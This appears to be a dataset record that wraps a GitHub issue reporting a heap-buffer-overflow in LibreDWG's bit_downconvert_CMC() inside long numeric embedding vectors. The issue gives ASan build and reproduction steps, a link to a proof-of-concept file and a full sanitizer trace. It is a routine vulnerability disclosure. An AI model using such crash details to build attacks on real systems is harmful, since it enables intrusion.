-0.006179731339216232, -0.003080173395574093, 0.005675738211721182, -0.0011630611261352897, -0.008397300727665424, 0.006780646275728941, 0.004776304122060537, 0.013220127671957016, -0.020469876006245613, -0.004756920039653778, -0.019012171775102615, 0.0007516282494179904, 0.01811273768544197, -0.010072109289467335, 0.013941225595772266, -0.0067224930971860886, 0.02482747845351696, 0.018329843878746033, -0.03090641088783741, -0.0053539578802883625, -0.01781809702515602, 0.008629913441836834, 0.009304489009082317, -0.00272156298160553, -0.00551290949806571, 0.00946731772273779, -0.01766302064061165, 0.004667751956731081, 0.0072458707727491856, -0.01053733378648758, -0.004404124803841114, 0.007994106970727444, 0.002715747570618987, -0.011188647709786892, 0.015236100181937218, 0.012250910513103008, 0.0085368687286973, 0.008932309225201607, 0.014189345762133598, 0.015205085277557373, 0.011995037086308002, 0.03231758996844292, -0.017042722553014755, -0.003149957163259387, 0.007839031517505646, 0.009847250767052174, -0.028270138427615166, 0.0011339845368638635, 0.0018589593237265944, -0.021632935851812363, -0.0018725283443927765, 0.020361322909593582, 0.03858261555433273, -0.0010341551387682557, -0.015096533112227917, 0.012638597749173641, 0.007548266556113958, 0.022237729281187057, -0.004780181217938662, 0.020562920719385147, -0.001998526742681861, 0.023199191316962242, -0.000531615864019841, 0.004923625383526087, -0.0007424206705763936, 0.0017058230005204678, -0.009203690104186535, 0.014104054309427738, 0.01076219230890274, -0.004958517383784056, -0.006191362161189318, 0.019291307777166367, 0.01284794881939888, 0.00882375705987215, 0.022144682705402374, 0.0026304565835744143, -0.03216251730918884, -0.013956733047962189, 0.03137163445353508, -0.005826936103403568, -0.007672326639294624, -0.016019228845834732, 0.009358764626085758, -0.012685120105743408, 0.009847250767052174, -0.00014477687363978475, -0.00405132956802845, -0.0064472355879843235, 0.018081722781062126, -0.006013025995343924, 0.0061060707084834576, 0.001442195731215179, 0.020066680386662483, -0.00902535393834114, 0.015329145826399326, 0.018035201355814934, 0.007257501129060984, 0.002444366691634059, -0.010692408308386803, 0.016174303367733955, 0.0028998989146202803, -0.027401719242334366, -0.011886484920978546, 0.006365821231156588, 0.012359462678432465, -0.0025219041854143143, -0.018391873687505722, -0.016360392794013023, -0.004249049816280603, -0.0007506590336561203, 0.006920213811099529, -0.005563308950513601, 0.016003720462322235, 0.012119096703827381, 0.030317125841975212, -0.0027855313383042812, 0.0042916955426335335, -0.022842520847916603, 0.009056368842720985, -0.004694890230894089, 0.001598239759914577, -0.009180429391562939, -0.0061874850653111935, 0.007261378224939108, 0.011964022181928158, 0.01463906280696392, -0.011909745633602142, 0.006350313778966665, 0.006171977613121271, -0.017151273787021637, -0.007633557543158531, 0.01209583505988121, 0.00117178400978446, -0.008816002868115902, 0.0053074355237185955, 0.008405054919421673, -0.01770954392850399, -0.01527486927807331, -0.024811970070004463, -0.0014867797726765275, -0.0022156313061714172, -0.002308676252141595, -0.0266263447701931, 0.004256803542375565, 0.0008785957470536232, 0.027417227625846863, -0.018888112157583237, 0.015290376730263233, 0.016980692744255066, -0.03334108367562294, -0.0370318666100502, -0.018205782398581505, -0.004640613682568073, 0.0033418622333556414, -0.004915871657431126, 0.017352871596813202, -0.003266263287514448, 0.0057416451163589954, 0.0021380940452218056, -0.0035667207557708025, 0.0021458477713167667, -0.0011659687152132392, 0.009281227365136147, -0.0028533765580505133, -0.015577265061438084, -0.00917267519980669, 0.004276188090443611, -0.020500890910625458, -0.00422578863799572, 0.003576412796974182, 0.009335503913462162, 0.005819182377308607, 0.010925021022558212, -0.019756531342864037, -0.029960453510284424, -0.011723656207323074, -0.028890438377857208, 0.0014179652789607644, 0.001340427901595831, 0.0036268122494220734, -0.007079165428876877, -0.0012309063458815217, -0.008947816677391529, 0.0015749785816296935, 0.006191362161189318, 0.02003566548228264, -0.003962161485105753, 0.016019228845834732, -0.000806389027275145, 0.007296270225197077, 0.01411956176161766, -0.009699929505586624, 0.03746607527136803, 0.01701170764863491, -0.0099790645763278, -0.00472978176549077, -0.03062727488577366, 0.013297664932906628, 0.004605722147971392, 0.00931999646127224, -0.012661858461797237, -0.006191362161189318, -0.030472200363874435, 0.0066759707406163216, 0.009878265671432018, -0.0303946640342474, -0.00868418999016285, -0.010622624307870865, -0.0013375203125178814, -0.018795067444443703, 0.016065750271081924, 0.0018182521453127265, 0.017151273787021637, 0.00790493842214346, -0.03476777300238609, 0.00816468894481659, 0.0058346898294985294, 0.008319763466715813, 0.0025994416791945696, -0.020128710195422173, 0.010134139098227024, 0.013848180882632732, -0.00371210346929729, 0.007098549511283636, -0.006113824434578419, -0.03675273060798645, 0.00851360708475113, 0.006741877645254135, 0.02817709371447563, 0.0004860626067966223, 0.0030375279020518064, 0.01781809702515602, 0.01004109438508749, 0.009940295480191708, 0.0024908892810344696, -0.006714739371091127, -0.004582460969686508, -0.004303325898945332, -0.008141427300870419, -0.0017862679669633508, 0.0125920744612813, -0.011863223277032375, 0.0013762889429926872, -0.00859114434570074, -0.00742420693859458, 0.010700162500143051, 0.009157167747616768, 0.018857097253203392, -0.024936029687523842, -0.01574009284377098, -0.019710008054971695, 0.02147786132991314, 0.013220127671957016, -0.02095060795545578, -0.00975420605391264, -0.005276420619338751, 0.005528416950255632, 0.016391407698392868, -0.0053539578802883625, -0.004977901466190815, -0.0099790645763278, 0.016810109838843346, -0.015561757609248161, 0.0025451653636991978, -0.017166782170534134, 0.014956966042518616, 0.002091571455821395, -0.014677830971777439, -0.008412809111177921, 0.022299759089946747, -0.015848645940423012, -0.023168176412582397, -0.018143752589821815, -0.03272078558802605, 0.005082577001303434, -0.011770178563892841, 0.007288516499102116, 0.004233542364090681, 0.0008209273219108582, 0.01933782920241356, 0.013793904334306717, 0.030921917408704758, 0.011374738067388535, -0.017213303595781326, 0.023710938170552254, 0.025137627497315407, 0.01939985901117325, 0.003068542806431651, 0.0074513447470963, 0.012483522295951843, -0.009451810270547867, 0.011250677518546581, 0.017569975927472115, 0.015150809660553932, 0.015119794756174088, 0.009506085887551308, 0.007827401161193848, 0.017321856692433357, -0.007777001708745956, 0.005245405714958906, 0.005761029198765755, 0.011180894449353218, 0.005431495141237974, 0.005074823275208473, 0.01030472107231617, -0.004625106230378151, 0.019725516438484192, 0.01481739804148674, -0.0007525974651798606, -0.0049895322881639, 0.0014867797726765275, -0.01637590117752552, 0.006431728135794401, 0.005698999390006065, 0.011653872206807137, -0.014259128831326962, -0.004326587542891502, 0.015654802322387695, -0.0017445916309952736, 0.014724353328347206, -0.007179963868111372, -0.014104054309427738, 0.005245405714958906, -0.0208265483379364, 0.025013567879796028, 0.006641078740358353, 0.014367681927978992, -0.006420097313821316, -0.010490811429917812, -0.007501744199544191, 0.030456693843007088, 0.0005117469117976725, -0.01955493353307247, -0.010808714665472507, -0.010862990282475948, 0.0085368687286973, -0.005881212186068296, -0.006086686626076698, -0.0021303403191268444, -0.00036709115374833345, 0.0011533689685165882, -0.01463906280696392, 0.006373574957251549, -0.004923625383526087, 0.01660851202905178, 0.0037217955105006695, -0.008816002868115902, 0.031185545027256012, 0.015150809660553932, -0.012057066895067692, 0.01030472107231617, -0.014042024500668049, 0.026703882962465286, -0.0011727532837539911, -0.011157632805407047, -0.009560362435877323, 0.011599595658481121, -0.002717686118558049, -0.032503679394721985, 0.013468247838318348, -0.008916801773011684, -0.0013491509016603231, 0.009932542219758034, 0.01368535216897726, -0.011855469085276127, 0.017849111929535866, -0.03137163445353508, 0.012545552104711533, 0.010374505072832108, 0.010397766716778278, 0.015616034157574177, 0.00590447336435318, -0.008327517658472061, 0.010700162500143051, 0.007404822390526533, -0.011374738067388535, -0.002463751006871462, 0.017740558832883835, -0.010397766716778278, 0.0031790337525308132, -0.01724431850016117, 0.00014295960136223584, -0.007094672881066799, 0.012351708486676216, 0.01702721416950226, -0.0033205393701791763, -0.019803054630756378, 0.005819182377308607, 0.01377064362168312, 0.004753042943775654, -0.013530277647078037, -0.0190897099673748, 0.021384816616773605, -0.0071993484161794186, -0.00903310813009739, 0.0015090717934072018, 0.0017668836517259479, -0.009102891199290752, 0.0130262840539217, -0.017042722553014755, 0.011452275328338146, 0.0009483793983235955, 0.00629603723064065, 0.009451810270547867, 0.0335892029106617, 0.01893463544547558, 0.0001822129124775529, -0.013538030907511711, 0.0050438083708286285, 0.014584786258637905, -0.011909745633602142, -0.00573001429438591, -0.018500424921512604, 0.002180739538744092, -0.008242226205766201, -0.0034387840423732996, 0.02726215310394764, 0.025959523394703865, 0.008350778371095657, -0.016251839697360992, -0.013096068054437637, -0.005757152568548918, 0.006117701530456543, 0.011188647709786892, 0.02192757837474346, -0.011863223277032375, -0.010436534881591797, 0.011646118946373463, 0.0006779676768928766, -0.011723656207323074, 0.0024773201439529657, 0.007346669211983681, -0.0028708225581794977, 0.013739628717303276, 0.026750406250357628, -0.010056601837277412, 0.02268744446337223, -0.0094052879139781, -0.013925718143582344, -0.0039854226633906364, 0.025277195498347282, 0.015825385227799416, 0.01660851202905178, 0.010614871047437191, -0.012886716984212399, 0.004535938147455454, 0.016856633126735687, 0.002151662949472666, 0.0038846239913254976, 0.0025761802680790424, -0.004411878529936075, -0.009420795366168022, 0.012452507391571999, 0.0062340074218809605, 0.022966580465435982, 0.012871209532022476, 0.006055671721696854, -0.02383499965071678, -0.0028281768318265676, 0.015391175635159016, 0.019756531342864037, -0.004981778562068939, 0.005520663224160671, -0.012188880704343319, 0.011622857302427292, -0.00952159333974123, -0.009901527315378189, 0.011870977468788624, 0.00612157816067338, -0.007532759103924036, 0.002359075704589486, -0.004493292886763811, -0.0033282930962741375, 0.012002790346741676, 0.0005771690630353987, 0.0018386057345196605, 0.019074201583862305, 0.013499262742698193, -0.010692408308386803, 0.00018608977552503347, 0.0013850119430571795, -0.006738000549376011, -0.008443824015557766, 0.006784522905945778, 0.006404589861631393, -0.0022388927172869444, -0.005156237632036209, 0.012646351009607315, -0.006268899422138929, -0.0022640922106802464, -0.013297664932906628, -0.003339923918247223, 0.008242226205766201, 0.00008989492926048115, 0.008242226205766201, -0.02626967430114746, -0.01863999292254448, 0.01863999292254448, -0.012289678677916527, 0.00393308512866497, -0.024052103981375694, -0.01010312419384718, -0.012444754131138325, -0.005509032867848873, 0.018500424921512604, 0.005516786593943834, -0.006765138823539019, -0.013142590411007404, -0.017120258882641792, 0.0027409472968429327, 0.0036830268800258636, 0.01354578509926796, 0.012305186130106449, 0.012212141416966915, -0.01586415432393551, -0.0017785142408683896, -0.026998525485396385, 0.0035938587971031666, 0.009265719912946224, 0.001978173153474927, 0.002907652873545885, 0.005505155771970749, -0.004055206198245287, 0.00790493842214346, 0.0033980768639594316, 0.017089243978261948, 0.01241373922675848, -0.015639295801520348, -0.010568348690867424, -0.00522602116689086, 0.0022388927172869444, -0.010785453021526337, -0.006858183536678553, -0.011242924258112907, 0.004927502013742924, 0.014313405379652977, -0.0074668521992862225, -0.007331161759793758, -0.003609366249293089, 0.024455297738313675, -0.004408001434057951, 0.0038012713193893433, 0.02321469970047474, 0.006051794625818729, 0.0167790949344635, -0.004206404555588961, -0.01766302064061165, 0.008544621989130974, -0.013623322360217571, -0.0027952236123383045, 0.002072187140583992, -0.00727688567712903, -0.03855159878730774, -0.01218112651258707, 0.008056136779487133, -0.00299488240852952, -0.007486236747354269, 0.0014654570259153843, 0.002661471487954259, -0.011049080640077591, 0.0055245403200387955, 0.012871209532022476, 0.009862758219242096, 0.013964487239718437, -0.0056951227597892284, 0.0017794835148379207, 0.0072458707727491856, 0.01806621626019478, 0.016422422602772713, -0.004865472204983234, 0.017228811979293823, -0.012026051990687847, 0.00795533787459135, 0.011576334945857525, -0.000052216597396181896, -0.013289911672472954, 0.007090795785188675, -0.01887260563671589, -0.029262617230415344, 0.011886484920978546, 0.018562454730272293, 0.030487708747386932, 0.006784522905945778, -0.011475536040961742, -0.0038322864565998316, -0.018764052540063858, 0.024905014783143997, 0.008916801773011684, 0.01656199060380459, -0.014104054309427738, 0.012987515889108181, -0.00738156121224165, -0.015755601227283478, -0.0028746994212269783, 0.05926959216594696, -0.00012515022535808384, 0.027525778859853745, 0.01603473536670208, -0.003380630863830447, -0.006962859071791172, -0.011886484920978546, -0.0070636579766869545, -0.0026110722683370113, -0.006125455256551504, 0.002799100475385785, 0.0013229820178821683, 0.0006047917995601892, -0.003130572848021984, -0.008490346372127533, 0.006749631371349096, -0.00009153048449661583, -0.002359075704589486, -0.0003355915832798928, -0.015592772513628006, -0.025711404159665108, -0.002465689554810524, 0.02031480148434639, -0.010894006118178368, -0.010033340193331242, 0.013514770194888115, 0.017492439597845078, -0.012336201034486294, 0.0029115297365933657, 0.007765371352434158, 0.02412964031100273, -0.010731177404522896, -0.012576567009091377, -0.011351476423442364, 0.010568348690867424, 0.023974565789103508, 0.007443591021001339, 0.018205782398581505, 0.003000697586685419, 0.009180429391562939, -0.0016612389590591192, 0.018422888591885567, -0.02471892535686493, -0.003973792307078838, -0.005160114262253046, -0.001016709255054593, -0.012646351009607315, 0.007808017078787088, 0.008839264512062073, 0.009413041174411774, 0.0006488912040367723, 0.0032623864244669676, -0.005431495141237974, 0.0012018297566100955, -0.008374040015041828, 0.01853143982589245, 0.005881212186068296, -0.0173683799803257, -0.005726137664169073, -0.009746451862156391, -0.020361322909593582, -0.0009110645623877645, -0.0074203298427164555, -0.016655035316944122, -0.020919593051075935, 0.0072497474029660225, 0.004365356173366308, 0.006361944135278463, -0.005850197281688452, 0.030022483319044113, -0.0012628905242308974, 0.004822826944291592, -0.020935099571943283, 0.008226718753576279, -0.0170737374573946, -0.01032798271626234, 0.023586878553032875, 0.00795533787459135, 0.011452275328338146, -0.00117178400978446, 0.001490656635724008, -0.014127315953373909, 0.019198261201381683, 0.0024133517872542143, -0.00651314202696085, -0.005404357332736254, -0.00902535393834114, -0.005640846211463213, -0.013212374411523342, 0.006214623339474201, 0.017554469406604767, -0.004628983326256275, -0.008676435798406601, -0.005361711606383324, 0.01643793098628521, -0.010847482830286026, -0.005710630211979151, -0.005954872816801071, 0.007994106970727444, -0.0010671085910871625, 0.015375668182969093, 0.0030181435868144035, -0.017290841788053513, 0.00945956353098154, 0.01088625192642212, 0.010165154002606869, 0.001212491188198328, 0.003128634300082922, -0.0013094129972159863, 0.0031441417522728443, 0.018841590732336044, 0.0021109560038894415, -0.014918196946382523, 0.017569975927472115, 0.02285802736878395, 0.009102891199290752, -0.01209583505988121, -0.0018657438922673464, 0.010203923098742962, 0.0035046907141804695, -0.004613475874066353, -0.012778164818882942, 0.04084670543670654, 0.020811039954423904, 0.009886019863188267, -0.00448553916066885, -0.008986585773527622, 0.022640923038125038, 0.0008703573839738965, 0.011537565849721432, -0.005067069549113512, -0.00888578686863184, 0.021741488948464394, 0.004128866828978062, -0.006788400001823902, 0.014685585163533688, -0.008715204894542694, 0.037373028695583344, 0.012584321200847626, -0.015499727800488472, 0.0005432464531622827, 0.03154221549630165, -0.01525160763412714, -0.005644723307341337, -0.0179421566426754, 0.03073582798242569, -0.014770875684916973, 0.02383499965071678, -0.019772039726376534, -0.01840738020837307, -0.0006983212660998106, 0.035512130707502365, 0.021198727190494537, 0.006951228715479374, -0.0037217955105006695, -0.005939365364611149, 0.0003789640904869884, 0.011444521136581898, 0.004590214695781469, -0.014724353328347206, 0.012119096703827381, 0.006361944135278463, -0.0011562765575945377, 0.004097851924598217, 0.007404822390526533, 0.0016515468014404178, -0.003962161485105753, -0.005749398842453957, 0.023757461458444595, 0.008552376180887222, -0.01189423818141222, -0.006148716434836388, 0.01724431850016117, -0.007152825593948364, -0.0006629448034800589, 0.026610838249325752, 0.02112118899822235, -0.0073854378424584866, 0.012716135010123253, 0.007579281460493803, 0.025602851063013077, 0.0011349538108333945, -0.016391407698392868, 0.011366983875632286, 0.05405908077955246, -0.018484918400645256, -0.0009716406348161399, -0.002857253421097994, 0.007792509626597166, -0.006226253695785999, -0.0031460803002119064, -0.010785453021526337, -0.012429246678948402, 0.002742885844781995, -0.013677598908543587, 0.005074823275208473, 0.0008941031992435455, 0.008901294320821762, 0.01713576726615429, 0.004066837020218372, 0.005792044103145599, -0.023354267701506615, -0.0066759707406163216, 0.006261145696043968 ]
113
null
null
null
null
null
null
null
null
null
[ "LibreDWG", "libredwg" ]
Hi, In release version 0.12.4, (also in the latest commit 45d2a29) There is heap buffer-overflow in function bit_downconvert_CMC() in bits.c **reproduce** ./configure --enable-release CFLAGS="-fsanitize=address" ./configure --enable-release make ./dwgrewrite [poc] [heap-buffer-overflow-bit_downconvert_CMC.zip](https://github.com/LibreDWG/libredwg/files/6622011/heap-buffer-overflow-bit_downconvert_CMC.zip) ```c AddressSanitizer: heap-buffer-overflow on address 0x60800000067c at pc 0x55afe2904dea bp 0x7ffef0aafa30 sp 0x7ffef0aafa20 READ of size 4 at 0x60800000067c thread T0 #0 0x55afe2904de9 in bit_downconvert_CMC /home/chiba/libredwg-check/src/bits.c:2830 #1 0x55afe2905597 in bit_write_CMC /home/chiba/libredwg-check/src/bits.c:2887 #2 0x55afe4b411a3 in dwg_encode_entity /home/chiba/libredwg-check/src/common_entity_data.spec:176 #3 0x55afe3b48880 in dwg_encode_TEXT /home/chiba/libredwg-check/src/dwg.spec:26 #4 0x55afe4b353cc in dwg_encode_add_object /home/chiba/libredwg-check/src/encode.c:3517 #5 0x55afe3b24eb6 in dwg_encode /home/chiba/libredwg-check/src/encode.c:2352 #6 0x55afe28e078d in dwg_write_file /home/chiba/libredwg-check/src/dwg.c:429 #7 0x55afe28dcf4f in main /home/chiba/libredwg-check/programs/dwgrewrite.c:349 #8 0x7fc7861cc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #9 0x55afe28dbbad in _start (/home/chiba/libredwg-check/asan-master/bin/dwgrewrite+0x207bad) 0x60800000067c is located 4 bytes to the right of 88-byte region [0x608000000620,0x608000000678) allocated by thread T0 here: #0 0x7fc7865f3dc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x55afe2ec16c5 in dwg_setup_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #2 0x55afe2ec1cb5 in dwg_decode_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #3 0x55afe34439b8 in dwg_decode_add_object /home/chiba/libredwg-check/src/decode.c:5900 #4 0x55afe29a635f in read_2004_section_handles /home/chiba/libredwg-check/src/decode.c:2928 #5 0x55afe29fffd0 in decode_R2004 /home/chiba/libredwg-check/src/decode.c:3778 #6 0x55afe2908735 in dwg_decode /home/chiba/libredwg-check/src/decode.c:252 #7 0x55afe28deb78 in dwg_read_file /home/chiba/libredwg-check/src/dwg.c:254 #8 0x55afe28dcb44 in main /home/chiba/libredwg-check/programs/dwgrewrite.c:290 #9 0x7fc7861cc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chiba/libredwg-check/src/bits.c:2830 in bit_downconvert_CMC Shadow bytes around the buggy address: 0x0c107fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8080: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa =>0x0c107fff80c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00[fa] 0x0c107fff80d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2245880==ABORTING ```
heap-buffer-overflow in bit_downconvert_CMC in bits.c
https://api.github.com/repos/LibreDWG/libredwg/issues/358/comments
1
2021-06-09T07:52:13
2022-02-06T17:40:53Z
https://github.com/LibreDWG/libredwg/issues/358
915,904,559
358
false
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : heap-buffer-overflow in bit_downconvert_CMC in bits.c Issue date: --- start body --- Hi, In release version 0.12.4, (also in the latest commit 45d2a29) There is heap buffer-overflow in function bit_downconvert_CMC() in bits.c **reproduce** ./configure --enable-release CFLAGS="-fsanitize=address" ./configure --enable-release make ./dwgrewrite [poc] [heap-buffer-overflow-bit_downconvert_CMC.zip](https://github.com/LibreDWG/libredwg/files/6622011/heap-buffer-overflow-bit_downconvert_CMC.zip) ```c AddressSanitizer: heap-buffer-overflow on address 0x60800000067c at pc 0x55afe2904dea bp 0x7ffef0aafa30 sp 0x7ffef0aafa20 READ of size 4 at 0x60800000067c thread T0 #0 0x55afe2904de9 in bit_downconvert_CMC /home/chiba/libredwg-check/src/bits.c:2830 #1 0x55afe2905597 in bit_write_CMC /home/chiba/libredwg-check/src/bits.c:2887 #2 0x55afe4b411a3 in dwg_encode_entity /home/chiba/libredwg-check/src/common_entity_data.spec:176 #3 0x55afe3b48880 in dwg_encode_TEXT /home/chiba/libredwg-check/src/dwg.spec:26 #4 0x55afe4b353cc in dwg_encode_add_object /home/chiba/libredwg-check/src/encode.c:3517 #5 0x55afe3b24eb6 in dwg_encode /home/chiba/libredwg-check/src/encode.c:2352 #6 0x55afe28e078d in dwg_write_file /home/chiba/libredwg-check/src/dwg.c:429 #7 0x55afe28dcf4f in main /home/chiba/libredwg-check/programs/dwgrewrite.c:349 #8 0x7fc7861cc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #9 0x55afe28dbbad in _start (/home/chiba/libredwg-check/asan-master/bin/dwgrewrite+0x207bad) 0x60800000067c is located 4 bytes to the right of 88-byte region [0x608000000620,0x608000000678) allocated by thread T0 here: #0 0x7fc7865f3dc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6) #1 0x55afe2ec16c5 in dwg_setup_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #2 0x55afe2ec1cb5 in dwg_decode_UNKNOWN_OBJ /home/chiba/libredwg-check/src/dwg.spec:7005 #3 0x55afe34439b8 in dwg_decode_add_object /home/chiba/libredwg-check/src/decode.c:5900 #4 0x55afe29a635f in read_2004_section_handles /home/chiba/libredwg-check/src/decode.c:2928 #5 0x55afe29fffd0 in decode_R2004 /home/chiba/libredwg-check/src/decode.c:3778 #6 0x55afe2908735 in dwg_decode /home/chiba/libredwg-check/src/decode.c:252 #7 0x55afe28deb78 in dwg_read_file /home/chiba/libredwg-check/src/dwg.c:254 #8 0x55afe28dcb44 in main /home/chiba/libredwg-check/programs/dwgrewrite.c:290 #9 0x7fc7861cc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/chiba/libredwg-check/src/bits.c:2830 in bit_downconvert_CMC Shadow bytes around the buggy address: 0x0c107fff8070: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8080: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8090: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80a0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa =>0x0c107fff80c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00[fa] 0x0c107fff80d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff80f0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa 0x0c107fff8100: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00 0x0c107fff8110: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2245880==ABORTING ``` --- end body ---
4,250
[ -0.03233176842331886, -0.013789425604045391, -0.007717906031757593, 0.00712565379217267, 0.05018128827214241, 0.02164887636899948, 0.006164640188217163, 0.05065807327628136, -0.005568663123995066, 0.03236156702041626, -0.01682145893573761, -0.00548671605065465, 0.0031083940993994474, 0.013037003576755524, 0.01717904582619667, 0.015480510890483856, -0.021425385028123856, 0.000019701008568517864, -0.014035265892744064, -0.007066056132316589, 0.02768314629793167, -0.01799851469695568, -0.003026447258889675, 0.04237398877739906, -0.02550782822072506, 0.01956295594573021, 0.00037015779525972903, 0.00790414959192276, 0.0019909366965293884, 0.009066305123269558, 0.010958532802760601, 0.038798123598098755, -0.028815504163503647, 0.005371245555579662, 0.03581823781132698, 0.008969458751380444, 0.04094364121556282, 0.07378198951482773, 0.008701268583536148, 0.011137326247990131, -0.015011178329586983, -0.06567669659852982, -0.01671716384589672, 0.018847782164812088, -0.006440280005335808, 0.022632239386439323, 0.003855228191241622, 0.006641422398388386, -0.027921536937355995, 0.01619568280875683, 0.016329778358340263, -0.004682146944105625, -0.023556003347039223, -0.05962752923369408, 0.006112492177635431, -0.021723372861742973, 0.024971449747681618, 0.03179538995027542, 0.011159675195813179, 0.0016221757978200912, -0.00649242801591754, 0.025835616514086723, 0.014817485585808754, 0.01799851469695568, -0.013037003576755524, 0.0058629270642995834, -0.023451708257198334, 0.023988086730241776, -0.020158933475613594, 0.005523964762687683, -0.04177800938487053, -0.02257264032959938, 0.01032530702650547, 0.03408990427851677, 0.02513534389436245, 0.0034641181118786335, 0.01945865899324417, 0.012530422769486904, -0.011398065835237503, 0.021425385028123856, -0.04368513822555542, 0.012023841962218285, -0.023004723712801933, 0.022185254842042923, 0.01710454933345318, -0.016583068296313286, -0.020546317100524902, -0.07419917732477188, -0.037337977439165115, -0.044281113892793655, -0.008850263431668282, 0.019592754542827606, 0.021082697436213493, 0.0028476540464907885, 0.0061013177037239075, -0.008433079347014427, -0.033583320677280426, -0.017238643020391464, -0.0475589893758297, -0.0038477785419672728, -0.033136337995529175, -0.01160665787756443, -0.0053377216681838036, 0.019860943779349327, 0.008477777242660522, 0.019711948931217194, 0.0016147260321304202, -0.018043212592601776, 0.02661038748919964, 0.11633477360010147, 0.005997021682560444, -0.009617583826184273, -0.0012850761413574219, 0.0320039801299572, -0.007896699011325836, 0.011070278473198414, 0.014832385815680027, -0.004879564046859741, -0.05247580260038376, -0.021678674966096878, -0.03456668555736542, -0.04726099967956543, -0.0196672510355711, 0.006868638563901186, -0.0036056628450751305, 0.016285080462694168, -0.012090889737010002, -0.014288555830717087, -0.05155203863978386, -0.010906385257840157, -0.028174826875329018, -0.04723120108246803, 0.016016891226172447, -0.018207106739282608, 0.002074745949357748, -0.0035125412978231907, -0.0026390620041638613, 0.0648423284292221, 0.007896699011325836, -0.007814752869307995, -0.07896699756383896, -0.03492427244782448, 0.017670728266239166, 0.0044176820665597916, -0.005121679976582527, 0.00348274246789515, -0.011033030226826668, 0.021455183625221252, -0.0034268696326762438, -0.016210582107305527, 0.000004361430455901427, -0.005952323321253061, 0.027668246999382973, 0.016016891226172447, 0.04499628767371178, -0.010362555272877216, 0.011442764662206173, 0.02906879410147667, -0.005043458193540573, -0.024196678772568703, -0.004454930312931538, -0.023839091882109642, 0.003339335322380066, -0.02112739533185959, -0.04067545011639595, 0.010660544037818909, 0.019965240731835365, 0.01929476484656334, -0.01856469362974167, 0.027742743492126465, 0.00008939659892348573, 0.007330521009862423, 0.02228955179452896, 0.014877083711326122, -0.05587287247180939, 0.022095859050750732, -0.015852997079491615, 0.002156693022698164, -0.010213561356067657, -0.007095854729413986, 0.0006159984041005373, -0.02284083142876625, 0.006782966665923595, 0.019860943779349327, 0.02570152096450329, -0.010168862529098988, 0.029396580532193184, -0.025850515812635422, -0.004905638284981251, 0.0007719768909737468, -0.010615846142172813, -0.018966978415846825, 0.012515523470938206, -0.034954071044921875, 0.023988086730241776, -0.016791660338640213, -0.044638700783252716, -0.00728582264855504, 0.02777254208922386, -0.016970453783869743, -0.0077775041572749615, 0.01426620688289404, -0.033762115985155106, 0.016046689823269844, -0.023377209901809692, 0.01525701954960823, -0.00882791355252266, 0.041271429508924484, 0.013849022798240185, -0.004946611821651459, -0.022647138684988022, -0.037457175552845, 0.0030506588518619537, 0.010630745440721512, -0.03026074729859829, 0.016985353082418442, -0.004313386045396328, 0.00443258136510849, -0.030275648459792137, -0.01801341399550438, 0.023988086730241776, -0.020546317100524902, 0.008887511678040028, -0.0035069540608674288, -0.0401986688375473, -0.003367271739989519, 0.0007021357887424529, 0.008708718232810497, -0.03757636994123459, 0.01247827522456646, 0.03453688696026802, -0.011033030226826668, -0.0027675696182996035, 0.01490688230842352, 0.004250063095241785, 